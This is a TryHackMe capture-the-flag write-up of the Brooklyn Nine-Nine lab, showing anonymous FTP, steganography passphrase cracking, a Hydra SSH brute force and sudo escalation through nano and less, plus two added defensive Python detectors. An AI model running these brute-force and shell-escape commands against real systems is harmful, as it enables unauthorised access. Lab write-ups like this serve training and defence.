Brooklyn Nine-Nine — TryHackMe WriteUp

Wilklins Nyatteng
Published in System Weakness · 8 min read · Aug 17, 2023

The Brooklyn Nine Nine room on TryHackMe is aimed at beginner-level hackers, but anyone can try the box. There are two intended ways to root it, and I'll walk through both. The only task given is "Deploy and get hacking", so let's get to it.

FIRST STEP

I started with a full-port Nmap scan:

└─$ nmap --min-rate 1000 -p- 10.10.132.150  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:26 EAT
Nmap scan report for 10.10.132.150
Host is up (0.32s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 116.95 seconds

Next I ran a service scan against the open ports, using the aggressive option (-A):

└─$ nmap -A -p21,22,80 10.10.132.150        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-16 19:30 EAT
Nmap scan report for 10.10.132.150
Host is up (0.33s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.35.209
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.75 seconds

Then I enumerated the services on each open port.

FTP (Port 21)

I started by logging in anonymously, since the scan results told us this is allowed (Anonymous FTP login allowed (FTP code 230)). The login worked and I found a txt file, which I downloaded to my local machine:

└─$ ftp 10.10.132.150
Connected to 10.10.132.150.
220 (vsFTPd 3.0.3)
Name (10.10.132.150:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||26747|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp> mget note_to_jake.txt
mget note_to_jake.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||26030|)
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
100% |***********************************************************************************************************************************************************************************************| 119 1.34 KiB/s 00:00 ETA
226 Transfer complete.
119 bytes received in 00:00 (0.30 KiB/s)

Viewing the contents of the file:

└─$ cat note_to_jake.txt 
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

HTTP (Port 80)

I opened the IP in a browser.

In the page source I found a hint left as an HTML comment (<!-- Have you ever heard of steganography? -->), so I downloaded the image to my local machine.

I first ran steghide info on the image to see what it contained, and found that the embedded data is protected by a passphrase. So I used stegcracker with the rockyou wordlist to brute-force it, which recovered the passphrase admin.

I then used steghide with that passphrase to extract the embedded data, which turned out to be a text file, note.txt:

└─$ steghide info brooklyn99.jpg                 
"brooklyn99.jpg":
format: jpeg
capacity: 3.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: can not uncompress data. compressed data is corrupted.

┌──(kali㉿kali)-[~/Downloads/THM/Brooklyn99]
└─$ stegcracker brooklyn99.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2023 - Luke Paris (Paradoxis)

StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.

StegSeek can be found at: https://github.com/RickdeJager/stegseek

Counting lines in wordlist..
Attacking file 'brooklyn99.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: admin
Tried 20395 passwords
Your file has been written to: brooklyn99.jpg.out
admin

┌──(kali㉿kali)-[~/Downloads/THM/Brooklyn99]
└─$ steghide --extract -sf brooklyn99.jpg
Enter passphrase:
wrote extracted data to "note.txt".

Reading the file, I found Holt's password (fluffydog12@ninenine):

└─$ cat note.txt 
Holts Password:
{REDACTED}

Enjoy!!

SSH was also open, so I tried the credentials there, and they worked:

└─$ ssh holt@10.10.132.150 
holt@10.10.132.150's password:
Last login: Tue May 26 08:59:00 2020 from 10.10.10.18

Looking around the home directory I found user.txt, whose contents (REDACTED) are the user flag:

holt@brookly_nine_nine:~$ ls
nano.save user.txt
holt@brookly_nine_nine:~$ cat user.txt
{REDACTED}
holt@brookly_nine_nine:~$

Next I needed a way to escalate privileges to root.

Alongside user.txt there was another file, nano.save. I tried to view its contents but did not have permission:

holt@brookly_nine_nine:~$ cat nano.save 
cat: nano.save: Permission denied

I checked this user's sudo privileges and was lucky enough to find a command Holt can run as root without a password:

holt@brookly_nine_nine:~$ sudo -l
Matching Defaults entries for holt on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User holt may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /bin/nano

So I turned to GTFOBins for a way to get a shell through nano. Searching for nano gives the following.

I went with the first option listed.

First, run nano as sudo:

sudo /bin/nano

Then press Ctrl+R followed by Ctrl+X.

Nano then prompts for a command to execute.

I entered the command below, pressed Enter and waited:

reset; sh 1>&0 2>&0

This dropped me into a root shell.

# whoami                                               
root

I looked for the flag and found it:

# cat /root/root.txt
-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: {REDACTED}

Enjoy!!
#

SECOND STEP

I started with a default Nmap scan. There are three open ports:

└─$ nmap 10.10.113.99                                         
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:54 EAT
Nmap scan report for 10.10.113.99
Host is up (0.29s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
9102/tcp filtered jetdirect

Nmap done: 1 IP address (1 host up) scanned in 32.04 seconds

Then I ran a service scan with -A (aggressive scan) against the open ports:

└─$ nmap -p21,22,80 -A 10.10.113.99         
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 11:57 EAT
Nmap scan report for 10.10.113.99
Host is up (0.30s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.35.209
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds

I then enumerated each port, starting with FTP.

FTP (Port 21)

The default scripts on port 21 told us that anonymous login is allowed (anonymous:anonymous), so we start with that.

I logged in successfully and found a .txt file (note_to_jake.txt):

└─$ ftp 10.10.113.99 
Connected to 10.10.113.99.
220 (vsFTPd 3.0.3)
Name (10.10.113.99:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||7166|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 119 May 17 2020 note_to_jake.txt
226 Directory send OK.
ftp> mget note_to_jake.txt
mget note_to_jake.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||64387|)
150 Opening BINARY mode data connection for note_to_jake.txt (119 bytes).
100% |***********************************************************************| 119 47.90 KiB/s 00:00 ETA
226 Transfer complete.
119 bytes received in 00:00 (0.38 KiB/s)
ftp>

I downloaded the file to my local machine to view its contents:

└─$ cat note_to_jake.txt 
From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

From this we learn that Jake is being told to change his password, so I used jake as the username for a password brute-force with Hydra, and it found the password. (On these machines I'd advise using lowercase for the usernames you find.)

└─$ hydra -l jake -P /usr/share/wordlists/rockyou.txt 10.10.113.99 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-17 12:13:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.113.99:22/
[22][ssh] host: 10.10.113.99 login: jake password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-17 12:14:18
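From the defender's side, a run like the Hydra attempt above leaves a dense burst of "Failed password" lines for one user from one source, followed by an "Accepted password" once a guess lands. The following added example (my own code for this writeup, not from the room or the original post) parses constructed sshd auth-log lines in Ubuntu's syslog format and flags exactly that pattern; the attacker IP and the 12:14:18 success time are taken from the writeup, the rest of the lines are made up.

```python
# Detect an SSH password-guessing run like the Hydra attempt against 'jake' above from
# sshd auth-log lines, and flag the failures-then-success pattern that means a guess landed.
# Added example for this writeup; the log lines are constructed, not captured from the room.
import re
from collections import defaultdict
from datetime import datetime

# Ubuntu sshd format: "Failed password for jake from 10.8.35.209 port 41200 ssh2"
AUTH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def parse(lines):
    """Yield (timestamp, result, user, ip) for each login line; other lines are skipped."""
    for line in lines:
        m = AUTH_RE.match(line)
        if m:
            # syslog omits the year; 2023 matches the writeup and is an assumption
            yield datetime.strptime(f"2023 {m['ts']}", "%Y %b %d %H:%M:%S"), m["result"], m["user"], m["ip"]

def detect(lines, threshold=5, window_s=60):
    """One alert per (ip, user) with >= threshold failures inside window_s seconds; 'cracked'
    is True when the same source later has an Accepted login for that user."""
    fails, accepted = defaultdict(list), set()
    for ts, result, user, ip in parse(lines):
        if result == "Failed":
            fails[(ip, user)].append(ts)
        elif fails.get((ip, user)):          # success only counts after earlier failures
            accepted.add((ip, user))
    alerts = []
    for (ip, user), times in fails.items():
        times.sort()
        for i in range(len(times) - threshold + 1):   # sliding window over sorted failures
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_s:
                alerts.append({"ip": ip, "user": user, "failures": len(times),
                               "cracked": (ip, user) in accepted})
                break
    return alerts

# Constructed: six rapid failures from the writeup's attacker IP, the success Hydra reported
# at 12:14:18, then an unrelated single failure and a non-login line that the parser skips.
SAMPLE_LOG = [f"Aug 17 12:13:{30 + i} brookly_nine_nine sshd[{1200 + i}]: Failed password for jake "
              f"from 10.8.35.209 port {41200 + i} ssh2" for i in range(6)] + [
    "Aug 17 12:14:18 brookly_nine_nine sshd[1210]: Accepted password for jake from 10.8.35.209 port 41233 ssh2",
    "Aug 17 12:15:00 brookly_nine_nine sshd[1215]: Failed password for amy from 10.8.35.1 port 50000 ssh2",
    "Aug 17 12:15:01 brookly_nine_nine sshd[1215]: Connection closed by 10.8.35.1 port 50000 [preauth]",
]
```

Calling detect(SAMPLE_LOG) returns a single alert for jake from 10.8.35.209 with cracked set to True; a real Hydra run with 16 tasks would produce far more than six failures per minute, so the default threshold is deliberately conservative.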

I logged in via SSH with the credentials and went to /home, where I found three directories named after the users we had seen. Checking each of them, I got lucky in holt's directory, where user.txt holds our flag:

└─$ ssh jake@10.10.113.99
jake@10.10.113.99's password:
Last login: Thu Aug 17 09:17:39 2023 from 10.8.35.209
jake@brookly_nine_nine:~$ cd /home/
jake@brookly_nine_nine:/home$ ls
amy holt jake
jake@brookly_nine_nine:/home$ cd holt/
jake@brookly_nine_nine:/home/holt$ ls
nano.save user.txt
jake@brookly_nine_nine:/home/holt$ cat user.txt
(ee11cbb19052e40b07aac0ca060c23ee)
jake@brookly_nine_nine:/home/holt$

Now to escalate privileges: I ran sudo -l and found a command jake may run as sudo without a password:

jake@brookly_nine_nine:/home/holt$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
jake@brookly_nine_nine:/home/holt$
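Both privilege escalations in this writeup come from the same misconfiguration: a NOPASSWD sudo rule on an editor or pager that GTFOBins documents as able to spawn a shell or read arbitrary files. The following added example (my own code for this writeup, not from the room or the original post) parses sudo -l output and flags such rules, so the nano rule from the first step and the less rule above would both be caught in an audit; the SHELL_CAPABLE set is an illustrative subset of GTFOBins and the sample output is constructed from the two listings in this post.

```python
# Audit `sudo -l` output for NOPASSWD rules on binaries that GTFOBins documents as
# able to hand the caller a root shell or root file read (nano and less in this room).
# Added example for this writeup, not code from the room or the original post.
import re

# Illustrative subset of GTFOBins sudo entries, chosen to cover the two binaries seen here.
SHELL_CAPABLE = {"nano", "less", "more", "vim", "vi", "man", "awk", "find"}

# A privilege line: "(ALL) NOPASSWD: /bin/nano" or "(root) /usr/bin/id, /usr/bin/less".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return one {runas, nopasswd, path} dict per command in the 'may run' block."""
    rules, in_block = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_block = True          # the Defaults lines above this are not privileges
            continue
        m = RULE_RE.match(line) if in_block else None
        if not m:
            continue
        tags = {t.strip().upper() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(","):
            if cmd.strip():          # first token is the binary; any args follow it
                rules.append({"runas": m["runas"], "nopasswd": "NOPASSWD" in tags,
                              "path": cmd.split()[0]})
    return rules

def findings(text):
    """Flag password-less rules whose binary can give a root shell or read root's files."""
    out = []
    for r in parse_sudo_l(text):
        name = r["path"].rsplit("/", 1)[-1]
        if r["nopasswd"] and name in SHELL_CAPABLE:
            out.append(f"{r['path']} as ({r['runas']}) with NOPASSWD: {name} is GTFOBins-listed")
    return out

# Constructed from the two `sudo -l` results in the writeup, plus two rules that should not fire.
SAMPLE = """\
Matching Defaults entries for jake on brookly_nine_nine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User jake may run the following commands on brookly_nine_nine:
    (ALL) NOPASSWD: /bin/nano
    (ALL) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/id
    (ALL) /usr/bin/vim
"""
```

findings(SAMPLE) reports the nano and less rules only: id is password-less but harmless here, and vim is GTFOBins-listed but still requires the user's password.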

So I ran the allowed binary as sudo to read the root flag directly:

sudo /usr/bin/less /root/root.txt

And found:

-- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: (REDACTED)

Enjoy!!

About the author

Wilklins Nyatteng is a cyber security enthusiast with interests in penetration testing & vulnerability assessments, OSINT and cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.

Follow me on:

Twitter, LinkedIn, Github